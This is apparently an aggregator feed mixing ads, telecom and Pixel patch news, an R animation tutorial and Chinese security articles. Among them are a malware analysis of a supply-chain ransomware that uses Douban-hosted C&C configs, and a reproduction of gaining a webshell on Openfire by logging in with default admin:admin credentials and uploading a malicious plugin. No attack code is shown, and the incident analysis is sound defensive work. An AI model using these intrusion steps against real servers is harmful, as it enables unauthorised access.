Alooma is an ETL data pipeline designed to help you handle data sprawl issues by getting your data into one place securely. Alooma brings all your data sources together into data warehouses like Azure, BigQuery, Redshift, and Snowflake, or cloud storage like Amazon S3. It can also handle the widest range of data sources ― flat files, RDBMS, S3 buckets, CSVs, among others.

Alooma can help you cleanse your data and align your data types on the fly while you move data to the target store. And Alooma can do this in near real time, so that you can make decisions at the speed of business.

Not only can Alooma help you bring your data together , but security is a cornerstone of Alooma’s business. Alooma meets critical compliance regulations, including SOC 2 Type II, HIPAA, GDPR, and EU-US Privacy Shield Framework, and supports OAuth 2.0. In addition, data is encrypted while in motion and at rest.

Are you ready to reign in your data sprawl?Contact Alooma today to see how we can help!

Optus Wholesale signs network partner deal with Transatel for Australia

$
0
0

Optus Wholesale has secured an agreement as the Australian network partner for European mobile virtual network company, Transatel, currently expanding its global network coverage to support its Internet of Things (IoT) offering.

Under the three-year agreement, Transatel will leverage the Optus mobile network to deliver an inbound data roaming solution for its customers’ end users in Australia.

Optus says the agreement is the first of its kind from Optus Wholesale and represents a major step forward in the evolution of its wholesale IoT product suite, “helping organisations unlock the value of networks in today’s connected and global economies”.

Along with the inbound roaming access, Optus Wholesale will also provide operational and business support to Transatel.

“Optus Wholesale is delighted to be appointed as Transatel’s exclusive network partner in Australia.” said John Castro, Acting Managing Director of Optus Wholesale and Satellite.

“The agreement between Optus and Transatel provides a foundation for global connectivity in Australia, helping industries and consumers capitalise on the growing IoT market. It ensures continuity of service and availability at a time when network connectivity is essential to nearly every facet of modern life.”

“Transatel prides itself in offering some of the industry’s most flexible and universal cellular connectivity solutions for MVNO businesses and the emerging IoT sector,” said Jacques Bonifay, Transatel CEO.

“Our commitment to delivering these services meant the reach and capabilities of the Optus network, along with the company’s continued investment in building next generation networks, were all significant factors in our decision.

“We’re excited to partner with Optus Wholesale in preparing the future of the IoT and cellular connectivity.”

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll
be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

公共场所免费WiFi别随意登录

$
0
0

原标题:公共场所免费WiFi别随意登录

全球信息安全领域再爆出庞大数量用户信息泄露事件。日前,万豪国际酒店集团披露,旗下喜达屋酒店的一个顾客预订数据库遭到入侵,有约5亿顾客的信息可能遭到泄露。业内表示,目前网络黑色产业已经形成了完整产业链,产业规模已超千亿元。

约5亿顾客信息或遭泄露

调查结果显示,自2014年开始,就有一未授权方开始对喜达屋酒店网络进行入侵。这些可能被泄露的信息包括顾客的姓名、出生日期、电话号码、护照号码、通信地址、电子邮箱、喜达屋VIP客户信息和其他一些个人信息。甚至对于部分客户,被泄露的信息还包括支付卡号码和有效日期,但这些数据是加密的。

信息安全问题目前成了国家、企业以及用户个人都关注的热点。我国工信部日前发布的2018年第三季度信息通信行业网络安全监管最新情况显示,第三季度,国家相关部门处置恶意网络资源、恶意程序、安全漏洞等网络安全威胁约3397万个。同时,第三季度,国家工业信息安全发展研究中心监测发现新增工业控制、智能设备、物联网等相关漏洞105个;中国信息通信研究院对31个工业互联网平台的126个域名、近170万个IP地址持续进行监测,发现疑似风险2600余个。

金融医疗行业泄密最严重

有数据显示,目前网络信息黑色产业规模已经达到千亿元规模,而据360公司信息安全专家介绍,信息泄露的主要手段分为技术手段,包括黑客入侵、软件漏洞、恶意木马,以及非技术手段,包括内部人员泄密、非有意识泄密等。在行业分布上,金融行业依然首当其冲,24%的数据泄露事件和金融机构有关;其次是医疗保健行业15%;再往后是销售行业15%以及公共部门12%。

个人信息泄露四大途径

第一,手机上下载了木马APP。

第二,平时上网时,不慎登录钓鱼网站。

第三,用户在注册网站账号时填写的各类信息,如果该网站数据库不够安全,一旦被黑客攻破网站,从而导致用户个人信息泄露。

第四,在公共场所一些没有密码的公共WiFi有可能是钓鱼WiFi。

防范措施:密码尽量复杂并定期修改

信息安全专家提醒,个人在面对数据泄露事件时,要提高自身的安全意识并采取合理的措施来避免问题的扩大化。个人用户要根据网站,设备重要等级分级使用多个独立高强度密码,定期变更密码,及时到数据泄露的公开网站进行自查,具体包括:

1.银行账户、支付账户、普通网站会员账号需要区别使用账号名和密码,定期修改密码;

2.个人资料的密码组合尽量采用大写字母、小写字母、数字等组合。

3.在一些需要填写身份证号、银行卡号、银行密码等网站时,需要认真检查网站合法性;

4.不随意登录不明WiFi,切勿轻易打开不明短信中的链接;

5.不要随意下载不明软件,要在手机中安装手机卫士等安全软件,及时查杀木马病毒软件,拦截钓鱼链接。

(责编:毕磊、杨波)


Animating regression models in R using broom and ggplot2

$
0
0

Animating regression models in R using broom and ggplot2
My first article on Towards Data Science was the result of a little exercise I set myself to keep the little grey cells ticking over. This is something of a similar exercise, albeit a bit more relevant to a project I’ve been working on. As I spend my time working in a marketing department, I have to get used to wearing [at least] two hats.

Often, these hats are mutually exclusive, and sometimes they disagree with each other. In this case, the disagreement is in the form of another piece of animated data visualisation. As with the animated Scottish rugby champions graph, this example doesn’t really benefit from adding the animation as another dimension to the plot.

The graph is simply to show the trends for some metrics to do with UK university fundraising over time. I only really need x and y to represent the value and the year, but where’s the fun in that? That’s the sort of thing we can plot ridiculously easily using ggplot2 :

ggplot(fund_tidy, aes(x = year, y = value, colour = kpi)) + geom_line()

Why not use this as a bit more of a learning exercise? I’ve played about with the gganimate package before, but never really spent any quality time with it. This seemed like a good opportunity.

The datavizconflict

And that brings us on to the butting of hats. I don’t think that an animated plot is the best way to represent these data. I don’t know if it technically counts as non-data ink, but you get the idea: it’s just not necessary. If x and y were already taken and I wanted to show how those two values changed over time, animation presents those changes in a way that’s easy to understand. In this case, it’s redundant.

For further adventures where marketing meets data science, follow Chris onTwitter .

However, a lot of graphs are made not to represent the data as simply and accurately as possible, but to get attention. In many cases, particularly in the world of the marketing agency, there is a tendency to turn what could be presented as a clear, straightforward bar chart, into a full-on novelty infographic. Tourist footfall over time represented as a cartoon foot with the size of the toe representing the value for each year anyone? But that’s a story for another day.

The truth is, animation catches the eye, and it can increase the dwell time, allowing the reader time to take in the title, axes labelling, legends and the message. Possibly. As well as increasing exposure to any branding. I do have some principles though, so I wouldn’t ever intentionally set out to make a graph that was misleading. Playing with the colour schemes and layout to make it look a bit sleeker? Absolutely, but the data has to come first.

A CASE oftrends

I had been doing some university fundraising work looking at historic Ross-CASE reports , and thought it would be interesting to look at how some of the key performance indicators had changed over time. I’d looked at some of the main ones before, but hadn’t looked at a few others, and thought it might be interesting to look at them together. And it would be some good ggplot2 and gganimate practice. So let us begin.

n.b. As the aim of this exercise was to compare underlying trends and spend more time with gganimate, not to produce a publication-quality figure, hence a somewhat ‘cavalier’ attitude to y axis labelling!

No onion skinninghere

As ever, importing my pre-made dataset and having a quick look was first on the agenda:

# import yearly data (total, summed values, not means or medians) # dataset compiled from historical Ross-CASE reports library(readr) fund_df <- read_csv("year_sum.csv") # quick look at data library(dplyr) glimpse(fund_df) Observations: 12 Variables: 6 $ year <int> 2005, 2006, 2007, 2008, 2009, 2... $ new_funds_raised <int> 452, 548, 682, 532, 600, 693, 7... $ cash_received <int> 324, 413, 438, 511, 506, 560, 5... $ fundraising_staff <int> 660, 734, 851, 913, 1043, 1079,... $ contactable_alumni <dbl> 5.7, 6.2, 6.9, 7.7, 8.3, 8.0, 8... $ contact_alum_x100 <dbl> 570, 620, 690, 770, 830, 800, 8... library(ggplot2) ggplot(fund_df, aes(x = year, y = new_funds_raised)) + geom_line()
Animating regression models in R using broom and ggplot2

Okay, we have a dataset that seems to look how I would expect it to from previous work, so hopefully I’ve not screwed things up at the first hurdle. Onward!

As the values for contactable_alumni were a couple of orders of magnitude away from the rest of the values, I created a new column where those were multiplied by 100 to put them on the same scale. I then gathered the data into a tidy, ‘long’, format:

# create contactable alumni x100 variable to place values on equivalent scale fund_df <- fund_df %>% mutate(contact_alum_x100 = contactable_alumni * 100) # create tidy dataframe library(tidyr) fund_tidy <- fund_df %>% gather(kpi, value, - year) %>% mutate(kpi = as.factor(kpi)) glimpse(fund_tidy) Observations: 60 Variables: 3 $ year <int> 2005, 2006, 2007, 2008, 2009, 2010, 2011, 20... $ kpi <fct> new_funds_raised, new_funds_raised, new_fund... $ value <dbl> 452, 548, 682, 532, 600, 693, 774, 681, 807,...

With the data transformed, we were ready to create our first animated plot, remembering to start by filtering out out original contactable_alumni variable:

# create animated plot library(gganimate) library(transformr) first_animate <- fund_tidy %>% filter(kpi != "contactable_alumni") %>% ggplot(aes(x = year, y = value, colour = kpi)) + geom_line() + # this next line is where the magic happens: transition_reveal(kpi, year) + labs(title = "Trends in University Fundraising KPIs Over Time", subtitle = "Data from Ross-CASE reports", x = "Year", y = 'Value', caption = "y axis labelling omitted due to differences in scale between KPIs", colour = "KPI") + scale_colour_discrete(labels = c("Cash received", "Contactable alumni", "Fundraising staff", "New funds raised")) + scale_y_discrete(labels = NULL) + theme_chris()
Animating regression models in R using broom and ggplot2

And we’re off. But is that as good as it could be? I don’t think so. The main thing for me is that, as we’re interested in trends, we should have trendlines on there as well. How to go about that…?

To do that in a non-animated way, we’d simply add a geom_smooth() to our plotting code:

# create non-animated plot with trendlines fund_tidy %>% f

BUF早餐铺 | 苹果终向印度政府妥协,同意安装防骚扰App;国产勒索病毒爆发,腾讯连夜发 ...

$
0
0

各位 Buffer 早上好,今天是 2018 年 12月4日星期二,农历十月二十七。今天的早餐铺内容有: 苹果终向印度政府妥协,同意安装防骚扰App; 警告:客户服务人员或许能够实时看到你输入的内容;国产勒索病毒爆发,腾讯连夜发布解密工具; 公安部网络安全保卫局发布 《互联网个人信息安全保护指引(征求意见稿)》 面向社会征求修改意见; 特朗普上台后,中国网络间谍活动再次飙升。


BUF早餐铺 | 苹果终向印度政府妥协,同意安装防骚扰App;国产勒索病毒爆发,腾讯连夜发 ...
苹果终向印度政府妥协,同意安装防骚扰App

在多年等待苹果公司对iPhone实施反垃圾邮件措施无果后,印度电信管理局TRAI在7月威胁到:2019年1月前,若苹果公司未通过由印度政府开发的防骚扰应用程序,将禁止iPhone进入印度的蜂窝网络。

随着最后期限的临近,苹果在印度的发言人证实,该应用程序已经可以在iOS应用商店里下载。DND注册程序利用了苹果最近引入iOS的电话或短信报告构架,将报告直接绑定到电话和短信应用程序中,并且只与印度政府共享垃圾邮件的内容。在用户选择垃圾电话或短信后,DND将自动创建投诉消息,并将它们发送到对应的运营商进行处理,而这些都是免费的。

TRAI DND应用程序可以在iOS应用商店免费下载。它要求iOS版本需在12.1及以上。[ ithome ] 警告:客户服务人员或许能够实时看到你输入的内容

据汽车博客Electrek消息,一位特斯拉车主成功破解了自己的Model 3汽车,并让它变成了一台昂贵的“Ubuntu电脑”。

比起Model S和Model X,Model 3的破解难度要更高。不过,Reddit用户trsohmers成功完成了破解,并发布了一个视频,表示自己成功地获取了Root、跑起了Ubuntu系统,还能上YouTube看视频。他表示,破解操作是建立以著名拆解网站Ingineerix的操作为基础的。

Ingineerix早先已经成功完成了破解,并进入了“工厂模式”。不过虽然成功攻击了Model 3的MCU,但无法访问Autopilot计算机。[ ithome ] 国产勒索病毒爆发,腾讯连夜发布解密工具

近日,不少电脑感染了一款新型勒索病毒,这也是首款要求使用微信扫码支付作为赎金的勒索病毒。腾讯电脑管家团队经过紧急处置,已完成病毒破解,并连夜发布解密工具测试版。

该勒索病毒感染系统后,会加密txt、office文档等有价值数据(与其他勒索病毒不同的是,没有修改原文件后缀名),并在桌面释放一个“你的电脑文件已被加密,点此解密”的快捷方式。该勒索病毒的传播源是一款叫“账号操作V3.1”的易语言软件(病毒传播者还利用了其他一些类似的黑灰产工具),其声称的主要功能是可以登录多个QQ帐号切换管理。

该工具为灰色产业从业人群使用的工具,这部分人群使用的工具有许多会被杀毒软件查杀,他们常常会无视杀毒软件的拦截提示。因而,这个勒索病毒针对灰产从业者的定向传播十分奏效。[ cnbeta ] 公安部网络安全保卫局发布 《互联网个人信息安全保护指引(征求意见稿)》 面向社会征求修改意见

为深入贯彻落实《网络安全法》,指导互联网企业建立健全公民个人信息安全保护管理制度和技术措施,有效防范侵犯公民个人信息违法行为,保障网络数据安全和公民合法权益,公安机关结合侦办侵犯公民个人信息网络犯罪案件和安全监督管理工作中掌握的情况,组织北京市网络行业协会、北京邮电大学和公安部第三研究所相关专家,研究起草了《互联网个人信息安全保护指引(征求意见稿)》。

为凝聚各界共识和智慧,进一步完善防护措施,更好地为互联网企业和广大网民保护个人信息提供指导指引,现面向社会广泛征求意见。公众可以登陆“全国互联网安全管理服务平台”( http://www.beian.gov.cn )查阅征求意见稿,有关建议可通过电子邮件方式发送至[emailprotected],或传真至010-66262319。[ beian ] 特朗普上台后,中国网络间谍活动再次飙升

三年前,美国总统贝拉克奥巴马(Barack Obama)与中国达成了一项几乎没有人认为有可能达成的协议:习近平主席同意结束中国多年来的做法――闯入美国企业、军事承包商和政府机构的电脑系统,以获得设计、技术和公司机密,通常是为了中国国有企业的利益。该协议是最早的网络空间控制协议之一。

在18个月左右的时间里,中国的袭击数量大幅下降。但特朗普总统就职后不久,中国的网络间谍活动再次抬头,据情报官员和分析人士称,随着贸易冲突和其他紧张局势开始破坏世界两大经济体之间的关系,间谍活动在去年开始加速。

特朗普和政府官员经常表示,中国所有获取技术的努力都等同于盗窃。在这个过程中,他们模糊了窃取技术和谈判交易之间的界限,公司同意将技术转让给中国制造业或营销合作伙伴,以换取进入中国市场。

这种做法经常被美国公司视为企业勒索的一种形式,窃取工业设计和知识产权――可能是发电厂、高效太阳能电池板或F-35战斗机的设计图――是一个长期存在的问题。

美国贸易代表本月发表了一份报告,详细介绍了过去与现在的案例。但本届政府从未说过,打击盗窃和网络攻击是否会成为谈判的一部分,还是仅仅要求中国停止在奥巴马时代就已经承认的非法活动。

但随着特朗普和习近平准备于本周末在阿根廷举行的20国集团领导人峰会上见面,中国的企业间谍活动再次成为美国抱怨的核心问题。美国贸易和情报官员,以及私人网络安全公司的专家都承认,之前的协议已完全破裂。他们一致认为,这使人们更难以想象特朗普与习近平之间达成的任何新协议能够成为解决问题的永久性方案,这个问题已经持续多年,而且似乎根植于对何谓合理竞争的迥异看法。[ nytimes ]

"微信支付"勒索病毒愈演愈烈 边勒索边窃取支付宝密码

$
0
0
感谢火绒安全的投递

12月1日爆发的"微信支付"勒索病毒正在快速传播,感染的电脑数量越来越多。病毒团伙入侵并利用豆瓣的C&C服务器,除了锁死受害者文件勒索赎金(支付通道已经关闭),还大肆偷窃支付宝等密码。首先,该病毒巧妙地利用"供应链污染"的方式进行传播,目前已经感染数万台电脑,而且感染范围还在扩大;

一、概述

其次,该病毒还窃取用户的各类账户密码,包括淘宝、天猫、阿里旺旺、支付宝、163邮箱、百度 云盘 、 京东 、QQ账号。其次,该病毒还窃取用户的各类账户密码,包括淘宝、天猫、阿里旺旺、支付宝、163邮箱、百度云盘、京东、QQ账号。

火绒团队强烈建议被感染用户,除了杀毒和解密被锁死的文件外,尽快修改上述平台密码。



图:日均感染量图,最高13134台(从病毒 服务器 获取的数据)

据火绒安全团队分析,病毒作者首先攻击软件 开发 者的电脑,感染其用以编程的"易语言"中的一个模块,导致开发者所有使用"易语言"编程的软件均携带该勒索病毒。广大用户下载这些"带毒"软件后,就会感染该勒索病毒。整过传播过程很简单,但污染"易语言"后再感染软件的方式却比较罕见。截止到12月3日,已有超过两万用户感染该病毒,并且被感染电脑数量还在增长。



图:供应链污染流程

此外,火绒安全团队发现病毒制作者利用豆瓣等平台当作下发指令的C&C服务器,火绒安全团队通过解密下发的指令后,获取其中一个病毒后台服务器,发现病毒作者已秘密收取数万条淘宝、天猫等账号信息。

二、样本分析

近期,火绒追踪到使用微信二维码扫描进行勒索赎金支付的勒索病毒Bcrypt在12月1日前后大范围传播,感染用户数量在短时间内迅速激增。通过火绒溯源分析发现,该病毒之所以可以在短时间内进行大范围传播,是因为该病毒传播是利用供应链污染的方式进行传播,病毒运行后会感染易语言核心静态库和精易模块,导致在病毒感染后编译出的所有易语言程序都会带有病毒代码。供应链污染流程图,如下图所示:



供应链污染流程图

编译环境被感染后插入的恶意代码

在易语言精易模块中被插入的易语言恶意代码,如下图所示:



精易模块中的恶意代码

在被感染的编译环境中编译出的易语言程序会被加入病毒下载代码,首先会通过HTTP请求获取到一组加密的下载配置,之后根据解密出的网址下载病毒文件到本地执行。如上图红框所示,被下载执行的是一组"白加黑"恶意程序,其中svchost为前期报告中所提到的白文件,svchost运行后会加载执行libcef.dll中所存放的恶意代码。下载执行病毒相关代码,如下图所示:

下载病毒文件相关代码

病毒代码中请求网址包含一个豆瓣链接和一个github链接,两者内容相同,仅以豆瓣链接为例。如下图所示:



请求到的网页内容

上述数据经过解密后,可以得到一组下载配置。如下图所示:



被解密的下载配置

解密相关代码,如下图所示:



解密代码

通过配置中的下载地址,我们可以下载到数据文件,数据文件分为两个部分:一个JPG格式图片文件和病毒Payload数据。数据文件,如下图所示:



数据文件

libcef.dll

libcef.dll中的恶意代码被执行后,首先会请求一个豆瓣网址链接( https://www.douban.com/note/69 *56/)。与被感染的易语言编译环境中的病毒插入的病毒代码逻辑相同,恶意代码可以通过豆瓣链接存放的数据,该数据可以解密出一组下载配置。解密后的下载配置,如下图所示:



下载配置

下载代码,如下图所示:



下载截取后的有效恶意代码数据中,包含有用于感染易语言编译环境的易语言核心静态库和精易模块。除此之外,下载的Payload文件中还包含有一个Zip压缩包,配合在病毒代码中所包含的通用下载逻辑,此处的Zip压缩包可能被替换为任意病毒程序。因为病毒作者使用供应链污染的传播方式,导致相关病毒感染量呈指数级增长。相关代码,如下图所示:



定位Payload压缩包位置回写文件

通过筛查豆瓣链接中存放的加密下载配置数据,我们发现在另外一个豆瓣链接( https://www.douban.com/note/69 *26/)中存放有本次通过供应链传播的勒索病毒Bcrypt。下载配置,如下图所示:



下载配置

我们在病毒模块JPG扩展名后,用"_"分割标注出了勒索病毒被释放时的实际文件名。最终被下载的勒索病毒压缩包目录情况,如下图所示:



勒索病毒压缩包目录情况

三、病毒相关数据分析

火绒通过病毒作者存放在众多网址中的加密数据,解密出了病毒作者使用的两台mysql服务器的登录口令。我们成功登录上了其中一台服务器,通过访问 数据库 ,我们发现通过该供应链传播下载的病毒功能模块:至少包含有勒索病毒、盗号木马、色情播放软件等。

我们还在服务器中发现被盗号木马上传的键盘记录信息,其中包括:淘宝、天猫、阿里旺旺、支付宝、163邮箱、百度云盘、京东、QQ账号等共计两万余条。

我们还在服务器中发现了Bcrypt病毒上传的勒索感染数据,通过仅对一台服务器数据的分析,我们统计到的病毒感染量共计23081台(数据截至到12月3日下午)。

日均感染量,如下图所示:



日均感染量

感染总量统计图,如下图所示:



感染总量

现火绒已经可以查杀此类被感染的易语言库文件,请装有易语言编译环境的开发人员下载安装火绒安全软件后全盘扫描查杀。查杀截图,如下图所示:



火绒查杀截图

四、 附录

样本SHA256:



Web安全之Openfire的插件脚本上传漏洞复现

$
0
0

*本文作者:si1ence,本文属 CodeSec 原创奖励计划,未经许可禁止转载。

前言

一次偶然的机会发现某台Web服务器被黑了之后被植入了挖矿病毒,然后忙活了好久清理完病毒之后就开始思考思考到底是怎么被黑的,俗话说的好死要死得明白。

服务器本身只开发了外网的web端口,然后初步怀疑是从web服务端进来的于是先用D盾查杀一下果不出所料查杀出一个webshell,路径却在Openfire目录下以前没有接触过这个玩意遂研究之。


Web安全之Openfire的插件脚本上传漏洞复现
Web安全之Openfire的插件脚本上传漏洞复现
0×1 功能介绍

Openfire 是基于XMPP 协议的IM 的服务器端的一个实现,虽然当两个用户连接后,可以通过点对点的方式来发送消息,但是用户还是需要连接到服务器来获取一些连接信息和通信信息的,所以服务器端是必须要实现的。Openfire 也提供了一些基本功能,但真的很基本的!庆幸的是,它也提供插件的扩展,像Spark 一样,同样强烈建议使用插件扩展的方式来增加新的功能,而不是修改人家的源代码。

然后上Zoomeye搜索一波,发现应用还挺广泛的:


Web安全之Openfire的插件脚本上传漏洞复现
0×2 过程溯源

由于是生产环境也不好瞎搞,然后就找到这个webshell的目录发现还有一个叫做helloworld.jar的包,打开一下才发现这个玩意才是上传的主体,然后自己从官网下载一个最新版本的openfire本地安装测试一下。


Web安全之Openfire的插件脚本上传漏洞复现

就一个exe安装文件直接点点点就好了,安装完毕之后直接就进入了配置界面截取关键的二个步骤如下:


Web安全之Openfire的插件脚本上传漏洞复现

然后进入了一个配置管理员的界面,说实话不知道是什么玩意也不知道有什么用然后就下一步下一步直接跳过了。


Web安全之Openfire的插件脚本上传漏洞复现

安装完成之后,进入登陆界面,输入用户名密码admin:admin直接就登陆成功了,毫无违和感。


Web安全之Openfire的插件脚本上传漏洞复现
Web安全之Openfire的插件脚本上传漏洞复现

发现有一个插件的地方,按照google搜索到的办法结合从服务器保存下来的helloword.jar文件然后就上传一下试一下,上传成功。


Web安全之Openfire的插件脚本上传漏洞复现

然后转换到用户接口设置的地方点击一下就直接访问到了webshell的内容:


Web安全之Openfire的插件脚本上传漏洞复现
Web安全之Openfire的插件脚本上传漏洞复现

测试了一下权限就是运行openfire的用户的管理system这波操作是真的可以。


Web安全之Openfire的插件脚本上传漏洞复现
0×3 过程分析

查看了一下helloword的包里面具体都包含了什么东西,看起来类似于一个基于servlet的网站目录结构。

查看了一下plugin.xml文件当中Url指向的是chakan.jsp这个文件,但是我并没有在这个web目录下面搜到这个jsp,反而是这个被查杀出来的sqzr.jsp这个代码貌似没有运行的样子。


Web安全之Openfire的插件脚本上传漏洞复现

根据xml当中提示:

Main plugin class 提示这里是你的插件全路径:

com.iteye.redhacker.openfire.plugin.helloWorldPlugin

才发现了chakan.jsp的源文件都还是class文件。


Web安全之Openfire的插件脚本上传漏洞复现

在web.xml当中发现了这个webapp插件同时也定义好了servlet-mapping所有的这个路径下资源的请求都通过chakan.jsp和update2.jsp处理。


Web安全之Openfire的插件脚本上传漏洞复现

管理员的用户名和密码都明文保存在保存在数据库当中:


Web安全之Openfire的插件脚本上传漏洞复现
0×4 总结

1.祸患常积于忽微平时在配置一些应用系统的时候看来还真的不能太马虎,跳过一小步可能就是安全一大步了

2.如果不是最开始扫描出来的那个sqzr.jsp这个大马估计排查起来需要很长的时间,这种基于war包和jar包的webshell查杀起来还是有些麻烦。

*本文作者:si1ence,本文属 CodeSec 原创奖励计划,未经许可禁止转载。

December 2018 security patch now rolling out for Pixel devices

$
0
0
Load it up! December 2018 security patch now rolling out for Pixel devices Latest patch addresses the Pixel 3 RAM management issues, along with some general improvements for all Pixel devices.

Marc Lagace

3 Dec 2018

Google is rolling out the last batch of security updates for 2018. Officially announced on December 3, the latest security patch delivers general security patches for some remote and local flaws affecting all Android devices, and also includes a number of updates and fixes specifically targeting Pixel devices.

Google said it would address RAM management issues on the Pixel 3 back in early November, and the fix has arrived with the December security update. The update is said to improve memory performance in certain circumstances, which pertains to issues reported by Pixel 3 users of the phone mismanaging memory for the sake of saving battery power in weird ways, such as randomly killing a music app left running in the background because you launched the camera.

Other fixes affecting Pixel devices include updates from both HTC and Qualcomm for low-level device drivers and bootloaders. Updated Pixel devices will also get camera improvements and improved Android Auto compatibility, Bluetooth patches, and improved notifications when using the Pixel Stand.

Both the factory images and OTA files are live right now, meaning you can already flash the patch to your phone if you don't feel like waiting for the over-the-air update to hit your phone.

Google Pixel 3 and Pixel 3 XL Main Google Pixel 3 and 3 XL review Google Pixel 3 and 3 XL: Everything you need to know! Google Pixel 3 vs. Pixel 3 XL: Which should you buy? Google Pixel 3 and 3 XL specifications Join our Pixel 3 forums Best Buy Verizon Google Store Project Fi
Viewing all 12749 articles
Browse latest View live